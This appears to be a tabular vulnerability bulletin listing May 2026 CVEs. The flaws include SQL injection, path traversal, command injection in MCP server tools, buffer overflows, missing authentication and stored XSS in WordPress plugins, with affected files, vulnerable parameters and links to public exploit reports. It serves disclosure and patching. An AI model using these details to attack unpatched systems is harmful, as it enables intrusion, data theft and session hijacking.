| PrefectHQ--prefect | A flaw has been found in PrefectHQ prefect up to 3.6.13. Affected is an unknown function of the file /api/events/in of the component WebSocket Endpoint. Executing a manipulation can lead to missing authentication. The attack may be performed from remote. The exploit has been published and may be used. Upgrading to version 3.6.14 is able to address this issue. This patch is called f8afecadf88ea5f73694dafa3a365b9d8fae1ad6. It is recommended to upgrade the affected component. The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product. | 2026-05-04 | 7.3 | CVE-2026-7723 | VDB-360899 | PrefectHQ prefect WebSocket Endpoint in missing authentication VDB-360899 | CTI Indicators (IOB, IOC, IOA) Submit #807256 | PerfectHQ Perfect <=3.6.13 Missing Critical Step in Authentication https://gist.github.com/nedlir/f1ab8aa038aafbcc6beeef21fab1d74f https://github.com/PrefectHQ/prefect/pull/20372 https://github.com/PrefectHQ/prefect/commit/f8afecadf88ea5f73694dafa3a365b9d8fae1ad6 https://github.com/PrefectHQ/prefect/releases/tag/3.6.14 https://github.com/PrefectHQ/prefect/ |
| Shandong Hoteam Software--PDM Product Data Management System | A vulnerability was determined in Shandong Hoteam Software PDM Product Data Management System up to 8.3.9. This affects the function GetQueryMachineGridOnePageData of the file /Base/BaseService.asmx/DataService. This manipulation of the argument SortOrder causes sql injection. The attack can be initiated remotely. Upgrading to version 8.3.10 is able to mitigate this issue. You should upgrade the affected component. | 2026-05-04 | 7.3 | CVE-2026-7727 | VDB-360902 | Shandong Hoteam Software PDM Product Data Management System DataService GetQueryMachineGridOnePageData sql injection VDB-360902 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #803268 | Shandong Hoteam Software Co., Ltd. PDM <8.3.10 SQL Injection https://ucn9h68n9289.feishu.cn/wiki/KvbxwRlmRihO8ZkT1E1c64pdngh https://en.hoteamsoft.com/pdm |
| n/a--funadmin | A flaw has been found in funadmin up to 7.1.0-rc6. This affects the function UploadService::chunkUpload of the file app/common/service/UploadService.php of the component Frontend Chunked Upload Endpoint. This manipulation of the argument File causes unrestricted upload. The attack is possible to be carried out remotely. The exploit has been published and may be used. Patch name: 59. To fix this issue, it is recommended to deploy a patch. | 2026-05-04 | 7.3 | CVE-2026-7733 | VDB-360908 | funadmin Frontend Chunked Upload Endpoint UploadService.php chunkUpload unrestricted upload VDB-360908 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807559 | FunAdmin v<=V7.1.0-rc6 Unrestricted Upload https://gitee.com/funadmin/funadmin/issues/IJ8NXT https://gitee.com/funadmin/funadmin/pulls/59 https://gitee.com/funadmin/funadmin/ |
| osrg--GoBGP | A vulnerability was found in osrg GoBGP up to 4.3.0. Affected is the function PathAttributeAigp.DecodeFromBytes of the file pkg/packet/bgp/bgp.go of the component AIGP Attribute Parser. Performing a manipulation results in buffer overflow. It is possible to initiate the attack remotely. Upgrading to version 4.4.0 is able to address this issue. The patch is named 51ad1ada06cb41ce47b7066799981816f50b7ced. The affected component should be upgraded. | 2026-05-04 | 7.3 | CVE-2026-7735 | VDB-360910 | osrg GoBGP AIGP Attribute bgp.go PathAttributeAigp.DecodeFromBytes buffer overflow VDB-360910 | CTI Indicators (IOB, IOC, IOA) Submit #807600 | GoBGP 4.3.0 Improper Input Validation https://github.com/osrg/gobgp/commit/51ad1ada06cb41ce47b7066799981816f50b7ced https://github.com/osrg/gobgp/releases/tag/v4.4.0 https://github.com/osrg/gobgp/ |
| osrg--GoBGP | A vulnerability was determined in osrg GoBGP up to 4.3.0. Affected by this vulnerability is the function parseRibEntry of the file pkg/packet/mrt/mrt.go. Executing a manipulation can lead to integer underflow. It is possible to launch the attack remotely. Upgrading to version 4.4.0 addresses this issue. This patch is called 76d911046344a3923cbe573364197aa081944592. It is suggested to upgrade the affected component. | 2026-05-04 | 7.3 | CVE-2026-7736 | VDB-360911 | osrg GoBGP mrt.go parseRibEntry integer underflow VDB-360911 | CTI Indicators (IOB, IOC, IOA) Submit #807604 | osrg GoBGP <= 4.3.0 Integer Underflow https://github.com/osrg/gobgp/commit/76d911046344a3923cbe573364197aa081944592 https://github.com/osrg/gobgp/releases/tag/v4.4.0 https://github.com/osrg/gobgp/ |
| @fastify/accepts-serializer--@fastify/accepts-serializer | @fastify/accepts-serializer cached serializer-selection results keyed by the request Accept header without a size limit or eviction policy. A remote unauthenticated client could send many distinct but matching Accept header variants to make the cache grow unbounded, eventually exhausting the Node.js heap and crashing the process. Versions <= 6.0.3 are affected. Update to 6.0.4 or later, which bounds the cache via an LRU with a default size of 100 entries, configurable through the new cacheSize plugin option. | 2026-05-04 | 7.5 | CVE-2026-7768 | https://cna.openjsf.org/security-advisories.html https://github.com/fastify/fastify-accepts-serializer/security/advisories/GHSA-qxhc-wx3p-2wmg |
| HashiCorp--Boundary | Boundary Community Edition and Boundary Enterprise ("Boundary") workers are vulnerable to a denial-of-service condition during node enrollment TLS handshakes. An attacker with network access to the worker authentication listener may open a connection and delay or withhold the client certificate during the TLS handshake, causing worker connection handling to block. This may prevent legitimate worker connections from being accepted or routed. This vulnerability, CVE-2026-7776, is fixed in Boundary 0.21.3, 0.20.3, 0.19.5. | 2026-05-04 | 7.5 | CVE-2026-7776 | https://discuss.hashicorp.com/t/hcsec-2026-11-boundary-workers-vulnerable-to-denial-of-service-during-tls-handshake |
| RTGS2017--NagaAgent | A vulnerability has been found in RTGS2017 NagaAgent up to 5.1.0. This issue affects some unknown processing of the file apiserver/routes/extensions.py of the component Skills Endpoint. Such manipulation of the argument Name leads to path traversal. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-04 | 7.3 | CVE-2026-7784 | VDB-360981 | RTGS2017 NagaAgent Skills Endpoint extensions.py path traversal VDB-360981 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807744 | RTGS2017 NagaAgent 5.10 Path Traversal https://github.com/RTGS2017/NagaAgent/issues/311 https://github.com/RTGS2017/NagaAgent/ |
| A-G-U-P-T-A--wireshark-mcp | A security flaw has been discovered in A-G-U-P-T-A wireshark-mcp edaf604416fbc94a201b4043092d4a1b09a12275/400c3da70074f22f3cce7ccb65304cafc7089c89. This affects the function quick_capture of the file pyshark_mcp.py. The manipulation results in os command injection. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks. This product operates on a rolling release basis, ensuring continuous delivery. Consequently, there are no version details for either affected or updated releases. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-04 | 7.3 | CVE-2026-7785 | VDB-360985 | A-G-U-P-T-A wireshark-mcp pyshark_mcp.py quick_capture os command injection VDB-360985 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807745 | A-G-U-P-T-A wireshark-mcp 400c3da70074f22f3cce7ccb65304cafc7089c89 Command Injection https://github.com/A-G-U-P-T-A/wireshark-mcp/issues/1 https://github.com/A-G-U-P-T-A/wireshark-mcp/ |
| Axle-Bucamp--MCP-Docusaurus | A security flaw has been discovered in Axle-Bucamp MCP-Docusaurus up to 404bc028e15ec304c9a045528560f4b5f27a17e0. The affected element is the function update_document/continue_document/delete_document/get_content of the file app/routes/document.py. Performing a manipulation of the argument DOCS_DIR/path results in path traversal. The attack may be initiated remotely. The exploit has been released to the public and may be used for attacks. This product uses a rolling release model to deliver continuous updates. As a result, specific version information for affected or updated releases is not available. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-05 | 7.3 | CVE-2026-7788 | VDB-360994 | Axle-Bucamp MCP-Docusaurus document.py get_content path traversal VDB-360994 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807746 | Axle-Bucamp MCP-Docusaurus 404bc028e15ec304c9a045528560f4b5f27a17e0 Path Traversal https://github.com/Axle-Bucamp/MCP-Docusaurus/issues/2 https://github.com/Axle-Bucamp/MCP-Docusaurus/ |
| Amazon--Workspaces | Improper privilege management in the log rotation mechanism of the Skylight Workspace Config Service in Amazon WorkSpaces for Windows before 2.6.2034.0 allows a local non-admin authenticated user to place arbitrary files into arbitrary locations bypassing file system permission protections, leading to local privilege escalation to SYSTEM. | 2026-05-04 | 7.8 | CVE-2026-7791 | https://aws.amazon.com/security/security-bulletins/2026-025-aws/ |
| UsamaK98--python-notebook-mcp | A flaw has been found in UsamaK98 python-notebook-mcp up to a05a232815809a7e425b5fa7be26e0d4369894c2. Impacted is the function create_notebook/read_notebook/edit_cell/add_cell of the file server.py. This manipulation causes path traversal. It is possible to initiate the attack remotely. The exploit has been published and may be used. This product is using a rolling release to provide continuous delivery. Therefore, no version details for affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-05 | 7.3 | CVE-2026-7810 | VDB-361070 | UsamaK98 python-notebook-mcp server.py add_cell path traversal VDB-361070 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807748 | UsamaK98 python-notebook-mcp a05a232815809a7e425b5fa7be26e0d4369894c2 Path Traversal https://github.com/UsamaK98/python-notebook-mcp/issues/5 https://github.com/UsamaK98/python-notebook-mcp/ |
| 54yyyu--code-mcp | A vulnerability has been found in 54yyyu code-mcp up to 4cfc4643541a110c906d93635b391bf7e357f4a8. The affected element is the function is_safe_path of the file src/code_mcp/server.py of the component MCP File Handler. Such manipulation leads to path traversal. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. This product takes the approach of rolling releases to provide continuous delivery. Therefore, version details for affected and updated releases are not available. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-05 | 7.3 | CVE-2026-7811 | VDB-361071 | 54yyyu code-mcp MCP File server.py is_safe_path path traversal VDB-361071 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807751 | 54yyyu code-mcp 4cfc4643541a110c906d93635b391bf7e357f4a8 Path Traversal https://github.com/54yyyu/code-mcp/issues/4 https://github.com/54yyyu/code-mcp/ |
| 54yyyu--code-mcp | A vulnerability was found in 54yyyu code-mcp up to 4cfc4643541a110c906d93635b391bf7e357f4a8. The impacted element is the function git_operation of the file src/code_mcp/server.py of the component MCP Tool. Performing a manipulation of the argument operation results in command injection. The attack can be initiated remotely. The exploit has been made public and could be used. Continuous delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-05 | 7.3 | CVE-2026-7812 | VDB-361072 | 54yyyu code-mcp MCP Tool server.py git_operation command injection VDB-361072 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807752 | 54yyyu code-mcp 4cfc4643541a110c906d93635b391bf7e357f4a8 Command Injection https://github.com/54yyyu/code-mcp/issues/5 https://github.com/54yyyu/code-mcp/ |
| Ivanti--Endpoint Manager Mobile | Improper certificate validation in Ivanti EPMM before versions 12.6.1.1, 12.7.0.1, and 12.8.0.1 allows a remote unauthenticated attacker to enroll a device belonging to a restricted set of unenrolled devices, leading to information disclosure about EPMM appliance and impacting on the integrity of the newly enrolled device identity. | 2026-05-07 | 7.4 | CVE-2026-7821 | https://hub.ivanti.com/s/article/May-2026-Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM-Multiple-CVEs?language=en_US |
| IObit--Advanced SystemCare | A security flaw has been discovered in IObit Advanced SystemCare 19. This affects an unknown part of the file ASC.exe of the component Service. The manipulation results in symlink following. Attacking locally is a requirement. This attack is characterized by high complexity. It is indicated that the exploitability is difficult. The exploit has been released to the public and may be used for attacks. | 2026-05-05 | 7 | CVE-2026-7832 | VDB-361111 | IObit Advanced SystemCare Service ASC.exe symlink VDB-361111 | CTI Indicators (IOB, IOC, IOA) Submit #797630 | IObit Advanced SystemCare 19 Link Following https://github.com/usernameone101/Writeups/blob/main/IObit%20Zero%20Day%20(Updated%20v2).pdf |
| EFM--ipTIME C200 | A weakness has been identified in EFM ipTIME C200 up to 1.092. This vulnerability affects the function sub_408F90 of the file /cgi/iux_set.cgi of the component ApplyRestore Endpoint. This manipulation of the argument RestoreFile causes command injection. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-05 | 7.2 | CVE-2026-7833 | VDB-361112 | EFM ipTIME C200 ApplyRestore Endpoint iux_set.cgi sub_408F90 command injection VDB-361112 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807786 | iptime c200 1.092 Command Injection https://github.com/glkfc/IoT-Vulnerability/blob/main/iptime/c200/sub_409054_vulnerability_report_EN.md |
| D-Link--DI-8100 | A vulnerability was identified in D-Link DI-8100 16.07.26A1. This affects the function sprintf of the file yyxz.asp. The manipulation of the argument ID leads to stack-based buffer overflow. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. | 2026-05-05 | 7.2 | CVE-2026-7851 | VDB-361128 | D-Link DI-8100 yyxz.asp sprintf stack-based overflow VDB-361128 | CTI Indicators (IOB, IOC, IOA) Submit #807798 | D-Link DI-8100 16.07.26A1 Denial of Service https://github.com/draw-ctf/report/blob/main/DI-8100/yyxz_dlink_asp_overflow.md https://www.dlink.com/ |
| D-Link--DI-8100 | A flaw has been found in D-Link DI-8100 16.07.26A1. This affects an unknown part of the file /url_member.asp of the component Web Management Interface. Executing a manipulation of the argument Name can lead to buffer overflow. The attack can be launched remotely. The exploit has been published and may be used. | 2026-05-05 | 7.2 | CVE-2026-7856 | VDB-361133 | D-Link DI-8100 Web Management url_member.asp buffer overflow VDB-361133 | CTI Indicators (IOB, IOC, IOA) Submit #807849 | D-Link DI-8100 16.07.26A1 Denial of Service https://github.com/draw-ctf/report/blob/main/DI-8100/url_member_asp_overflow.md https://www.dlink.com/ |
| D-Link--DI-8100 | A vulnerability has been found in D-Link DI-8100 16.07.26A1. This vulnerability affects the function sprintf of the file /user_group.asp of the component CGI Handler. The manipulation leads to buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2026-05-05 | 7.2 | CVE-2026-7857 | VDB-361134 | D-Link DI-8100 CGI user_group.asp sprintf buffer overflow VDB-361134 | CTI Indicators (IOB, IOC, IOA) Submit #807853 | D-Link DI-8100 16.07.26A1 Denial of Service https://github.com/draw-ctf/report/blob/main/DI-8100/user_group_asp_overflow.md https://www.dlink.com/ |
| PicoTronica--e-Clinic Healthcare System ECHS | A flaw has been found in PicoTronica e-Clinic Healthcare System ECHS 5.7. The impacted element is an unknown function of the file /cdemos/echs/priv/echs.js. This manipulation of the argument ADMIN_KEY causes hard-coded credentials. The attack is possible to be carried out remotely. The exploit has been published and may be used. Upgrading to version 5.7.1 is sufficient to resolve this issue. The affected component should be upgraded. The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product. | 2026-05-06 | 7.3 | CVE-2026-8032 | VDB-361358 | PicoTronica e-Clinic Healthcare System ECHS echs.js hard-coded credentials VDB-361358 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #800792 | PicoTronica e-Clinic Healthcare System (ECHS) v5.7 Improper Privilege Management https://docs.google.com/document/d/1w1veNs8I3nxsVxbSiIgJmt-4S5a0rW0bvjDvEe7iDr0/edit?usp=sharing |
| SourceCodester--Pharmacy Sales and Inventory System | A vulnerability was found in SourceCodester Pharmacy Sales and Inventory System 1.0. This affects an unknown part of the file /ajax.php?action=save_user. The manipulation of the argument ID results in sql injection. The attack can be executed remotely. The exploit has been made public and could be used. | 2026-05-07 | 7.3 | CVE-2026-8083 | VDB-361837 | SourceCodester Pharmacy Sales and Inventory System ajax.php save_user sql injection VDB-361837 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807848 | sourcecodester Pharmacy Sales and Inventory System V1.0 SQL injection https://github.com/zhi-cyber/cve-2/issues/1 https://www.sourcecodester.com/ |
| code-projects--Feedback System | A security vulnerability has been detected in code-projects Feedback System 1.0. Impacted is an unknown function of the file /admin/checklogin.php. Such manipulation of the argument email leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used. | 2026-05-07 | 7.3 | CVE-2026-8098 | VDB-361851 | code-projects Feedback System checklogin.php sql injection VDB-361851 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808126 | code-projects FEEDBACK SYSTEM V1.0 SQL Injection https://github.com/redshadowword-cell/CVE/issues/3 https://code-projects.org/ |
| SourceCodester--Comment System | A flaw has been found in SourceCodester Comment System 1.0. This issue affects some unknown processing of the file post_comment.php. This manipulation of the argument Name causes sql injection. Remote exploitation of the attack is possible. The exploit has been published and may be used. | 2026-05-08 | 7.3 | CVE-2026-8126 | VDB-361916 | SourceCodester Comment System post_comment.php sql injection VDB-361916 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808686 | sourcecodester Comment System V1.0 SQL Injection https://github.com/redshadowword-cell/CVE/issues/7 https://www.sourcecodester.com/ |
| SourceCodester--SUP Online Shopping | A vulnerability was found in SourceCodester SUP Online Shopping 1.0. The affected element is an unknown function of the file /admin/viewmsg.php. Performing a manipulation of the argument msgid results in sql injection. The attack is possible to be carried out remotely. The exploit has been made public and could be used. | 2026-05-08 | 7.3 | CVE-2026-8128 | VDB-361918 | SourceCodester SUP Online Shopping viewmsg.php sql injection VDB-361918 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808772 | sourcecodester SUP Online Shopping V1.0 SQL Injection https://github.com/redshadowword-cell/CVE/issues/9 https://www.sourcecodester.com/ |
| SourceCodester--SUP Online Shopping | A vulnerability was determined in SourceCodester SUP Online Shopping 1.0. The impacted element is an unknown function of the file wishlist.php. Executing a manipulation of the argument delwlistid can lead to sql injection. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. | 2026-05-08 | 7.3 | CVE-2026-8129 | VDB-361919 | SourceCodester SUP Online Shopping wishlist.php sql injection VDB-361919 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808773 | sourcecodester SUP Online Shopping V1.0 SQL Injection https://github.com/redshadowword-cell/CVE/issues/10 https://www.sourcecodester.com/ |
| SourceCodester--SUP Online Shopping | A vulnerability was identified in SourceCodester SUP Online Shopping 1.0. This affects an unknown function of the file /admin/message.php. The manipulation of the argument seenid leads to sql injection. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. | 2026-05-08 | 7.3 | CVE-2026-8130 | VDB-361920 | SourceCodester SUP Online Shopping message.php sql injection VDB-361920 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808774 | sourcecodester SUP Online Shopping V1.0 SQL Injection https://github.com/redshadowword-cell/CVE/issues/11 https://www.sourcecodester.com/ |
| SourceCodester--SUP Online Shopping | A security flaw has been discovered in SourceCodester SUP Online Shopping 1.0. This impacts an unknown function of the file /admin/replymsg.php. The manipulation of the argument msgid results in sql injection. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks. | 2026-05-08 | 7.3 | CVE-2026-8131 | VDB-361921 | SourceCodester SUP Online Shopping replymsg.php sql injection VDB-361921 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808775 | sourcecodester SUP Online Shopping V1.0 sql https://github.com/redshadowword-cell/CVE/issues/12 https://www.sourcecodester.com/ |
| CodeAstro--Leave Management System | A weakness has been identified in CodeAstro Leave Management System 1.0. Affected is an unknown function of the file /login.php. This manipulation of the argument txt_username causes sql injection. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks. | 2026-05-08 | 7.3 | CVE-2026-8132 | VDB-361922 | CodeAstro Leave Management System login.php sql injection VDB-361922 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808784 | codeastro Leave Management System V1.0 SQL Injection https://github.com/yihaofuweng/cve/issues/64 https://codeastro.com/ |
| zyx0814--FilePress | A security vulnerability has been detected in zyx0814 FilePress up to 2.2.0. Affected by this vulnerability is an unknown functionality of the file dzz/shares/admin.php of the component Shares Filelist API. Such manipulation of the argument order leads to sql injection. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. The name of the patch is e20ec58414103f781858f2951d178e19b1736664. A patch should be applied to remediate this issue. | 2026-05-08 | 7.3 | CVE-2026-8133 | VDB-361923 | zyx0814 FilePress Shares Filelist API admin.php sql injection VDB-361923 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808819 | zyx0814 FilePress <=2.2.0 SQL Injection https://github.com/zyx0814/FilePress/issues/70 https://github.com/zyx0814/FilePress/pull/71 https://github.com/xiaohaiyang-ai/Web-Security-Research/tree/main/FilePress/Shares-API-PreAuth-SQLi https://github.com/zyx0814/FilePress/commit/e20ec58414103f781858f2951d178e19b1736664 https://github.com/zyx0814/FilePress/ |
| Industrial Application Software IAS--Canias ERP | A vulnerability was identified in Industrial Application Software IAS Canias ERP 8.03. This issue affects the function iasServerRemoteInterface.doAction of the component Java RMI Session Management. Such manipulation leads to improper authentication. The attack can be launched remotely. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-10 | 7.3 | CVE-2026-8216 | VDB-362433 | Industrial Application Software IAS Canias ERP Java RMI Session Management iasServerRemoteInterface.doAction improper authentication VDB-362433 | CTI Indicators (IOB, IOC, IOA) Submit #808244 | Industrial Application Software - IAS Canias ERP 8.03-- Improper Authentication (CWE-287) https://hawktrace.com/blog/caniaserp |
| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| Rocketsoft--Rocket LMS | Rocket LMS 1.1 contains a persistent cross-site scripting vulnerability in the support ticket module that allows authenticated users to inject malicious script code through the title parameter. Attackers can submit support tickets with embedded HTML/JavaScript payloads that execute in the browsers of other users viewing the message history, enabling session hijacking and phishing attacks. | 2026-05-10 | 6.4 | CVE-2021-47907 | ExploitDB-50677 Official Product Homepage VulnCheck Advisory: Rocket LMS 1.1 Persistent Cross-Site Scripting via Support Tickets |
| Accesspressthemes--AccessPress Social Icons | AccessPress Social Icons 1.8.2 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by entering JavaScript payloads into the 'icon title' field. Attackers can store XSS payloads like image tags with onerror event handlers that execute when the plugin page is viewed, affecting all users who access the plugin interface. | 2026-05-10 | 6.4 | CVE-2021-47910 | ExploitDB-50515 Official Product Homepage Product Reference VulnCheck Advisory: WordPress Plugin AccessPress Social Icons 1.8.2 Stored XSS |
| Soliloquywp--Slider by Soliloquy | Slider by Soliloquy 2.6.2 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts through the title parameter. Attackers can add JavaScript payloads in the title field when creating or editing sliders, which executes in the browsers of users viewing the slider on both administrative and frontend pages. | 2026-05-10 | 6.4 | CVE-2021-47922 | ExploitDB-50563 Official Product Homepage Product Reference VulnCheck Advisory: WordPress Plugin Slider by Soliloquy 2.6.2 Stored XSS |
| Etoilewebdesign--Ultimate Product Catalog | Ultimate Product Catalog 5.8.2 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts through the price parameter. Attackers can submit POST requests to post.php with HTML/JavaScript payloads in the price field to execute arbitrary code when the product is viewed. | 2026-05-10 | 6.4 | CVE-2021-47924 | ExploitDB-50534 Official Product Homepage Product Reference VulnCheck Advisory: WordPress Plugin Ultimate Product Catalog 5.8.2 Stored XSS via price |
| Cmdbuild--CMDBuild | CMDBuild 3.3.2 contains multiple stored cross-site scripting vulnerabilities that allow authenticated attackers to inject arbitrary web script or HTML via crafted input in card creation and file upload endpoints. Attackers can inject XSS payloads through Employee card parameters or SVG file attachments in the classes endpoint, which execute when other users view the affected records or preview attachments. | 2026-05-10 | 6.4 | CVE-2021-47925 | ExploitDB-50527 Official Product Homepage Product Reference VulnCheck Advisory: CMDBuild 3.3.2 Multiple Stored Cross-Site Scripting |
| Form2Email--Contact Form to Email | Contact Form to Email 1.3.24 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by creating forms with script tags in the form name field. Attackers can craft form names containing JavaScript code that executes when other logged-in users access the form management page, enabling session hijacking or credential theft. | 2026-05-10 | 6.4 | CVE-2021-47926 | ExploitDB-50524 Official Product Homepage VulnCheck Advisory: WordPress Contact Form to Email 1.3.24 Stored XSS |
| Wpsymposiumpro--WP Symposium Pro | WordPress Plugin WP Symposium Pro 2021.10 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by exploiting insufficient sanitization of the forum name parameter. Attackers can submit POST requests to the admin setup page with JavaScript payloads in the wps_admin_forum_add_name parameter, which are stored and executed when the forum is accessed. | 2026-05-10 | 6.4 | CVE-2021-47927 | ExploitDB-50514 Official Product Homepage Product Reference VulnCheck Advisory: WordPress Plugin WP Symposium Pro 2021.10 Stored XSS via wps_admin_forum_add_name |
| Filterable-Portfolio--Filterable Portfolio Gallery | Filterable Portfolio Gallery 1.0 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious JavaScript by entering payloads in the title field. Attackers can store JavaScript code like image tags with onerror handlers that execute when the gallery is previewed, affecting all users viewing the page. | 2026-05-10 | 6.4 | CVE-2021-47929 | ExploitDB-50458 Official Product Homepage Product Reference VulnCheck Advisory: WordPress Plugin Filterable Portfolio Gallery 1.0 Stored XSS |
| Exponentcms--Exponent CMS | Exponent CMS 2.6 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts through the Title and Text Block parameters in the text editing endpoint. Attackers can inject iframe payloads with embedded SVG onload events to execute arbitrary JavaScript, and the application also exposes database credentials in responses and lacks brute-force protection on authentication endpoints. | 2026-05-10 | 6.4 | CVE-2021-47931 | ExploitDB-50611 Official Product Homepage VulnCheck Advisory: Exponent CMS 2.6 Multiple Vulnerabilities Stored XSS Authentication |
| Projectsend--Projectsend | Projectsend r1295 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by submitting crafted input in the 'name' parameter of files-edit.php. Attackers can inject JavaScript payloads through the file name field that execute in the browser when the file is viewed by other users, particularly affecting System Administrator users on the Dashboard page. | 2026-05-10 | 6.4 | CVE-2021-47947 | ExploitDB-50240 Official Product Homepage Product Reference VulnCheck Advisory: Projectsend r1295 Stored Cross-Site Scripting via files-edit.php |
| Ampps--Advanced Guestbook | Advanced Guestbook 2.4.4 contains a persistent cross-site scripting vulnerability in the smilies administration interface that allows authenticated attackers to inject malicious scripts by manipulating the s_emotion parameter. Attackers can submit POST requests to admin.php with JavaScript code in the s_emotion field, which executes when administrators view the smilies tab. | 2026-05-10 | 6.4 | CVE-2021-47950 | ExploitDB-49875 Official Product Homepage VulnCheck Advisory: Advanced Guestbook 2.4.4 Persistent XSS via Smilies |
| picture-gallery--Picture Gallery | WordPress Picture Gallery 1.4.2 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts through the Edit Content URL field in the Access Control settings. Attackers can enter JavaScript payloads in the plugin options that are stored in the database and executed when the functionality is triggered, enabling session hijacking or credential theft. | 2026-05-10 | 6.4 | CVE-2021-47951 | ExploitDB-50187 Product Reference VulnCheck Advisory: WordPress Picture Gallery 1.4.2 Stored XSS via Edit Content URL |
| Moodle--Moodle LMS | Moodle LMS 4.0 contains a cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by submitting payloads through the search parameter. Attackers can inject JavaScript code via the search field in course/search.php to execute arbitrary scripts in users' browsers and steal session cookies. | 2026-05-10 | 6.1 | CVE-2022-50943 | ExploitDB-51115 Official Product Homepage Product Reference VulnCheck Advisory: Moodle LMS 4.0 Cross-Site Scripting via course search.php |
| 3dady--real-time web stats | WordPress 3dady real-time web stats plugin 1.0 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious JavaScript by exploiting unsanitized input fields. Attackers can insert JavaScript payloads in the dady_input_text or dady2_input_text fields via the plugin options panel to execute arbitrary code when the page is viewed. | 2026-05-10 | 6.4 | CVE-2022-50945 | ExploitDB-51021 Official Product Homepage VulnCheck Advisory: WordPress 3dady Real-Time Web Stats 1.0 Stored XSS |
| netroics--Netroics Blog Posts Grid | WordPress Plugin Netroics Blog Posts Grid 1.0 contains a stored cross-site scripting vulnerability that allows authenticated editors to inject malicious scripts by failing to sanitize the post_title parameter. Attackers with editor privileges can inject script payloads through the testimonial title field that execute in the browsers of other users viewing the draft post, enabling cookie theft and session hijacking. | 2026-05-10 | 6.4 | CVE-2022-50946 | ExploitDB-51008 Product Reference VulnCheck Advisory: WordPress Plugin Netroics Blog Posts Grid 1.0 Stored XSS |
| RadiusTheme--Testimonial Slider and Showcase | WordPress Plugin Testimonial Slider and Showcase 2.2.6 contains a stored cross-site scripting vulnerability that allows authenticated editors to inject malicious scripts by failing to sanitize the post_title parameter. Attackers with editor privileges can inject JavaScript payloads through the testimonial title field that execute in the browsers of users viewing the draft post, enabling cookie theft and session hijacking. | 2026-05-10 | 6.4 | CVE-2022-50947 | ExploitDB-51007 Official Product Homepage Product Reference VulnCheck Advisory: WordPress Plugin Testimonial Slider and Showcase 2.2.6 Stored XSS |
| Motopress--Motopress Hotel Booking Lite | Motopress Hotel Booking Lite 4.2.4 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by submitting payloads in accommodation type fields. Attackers can inject script tags through the title and excerpt parameters when creating accommodation types, which execute in the browser when visitors access the accommodations page. | 2026-05-10 | 6.4 | CVE-2022-50948 | ExploitDB-50951 Official Product Homepage VulnCheck Advisory: Motopress Hotel Booking Lite 4.2.4 Stored Cross-Site Scripting |
| A-J-Evolution--Videos sync PDF | WordPress Plugin Videos sync PDF 1.7.4 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by exploiting unsanitized nom, pdf, mp4, webm, and ogg parameters. Attackers can inject payloads like autofocus onfocus event handlers through the plugin options panel to execute arbitrary JavaScript when administrators view or edit video settings. | 2026-05-10 | 6.4 | CVE-2022-50949 | ExploitDB-50874 Official Product Homepage VulnCheck Advisory: WordPress Plugin Videos sync PDF 1.7.4 Stored XSS |
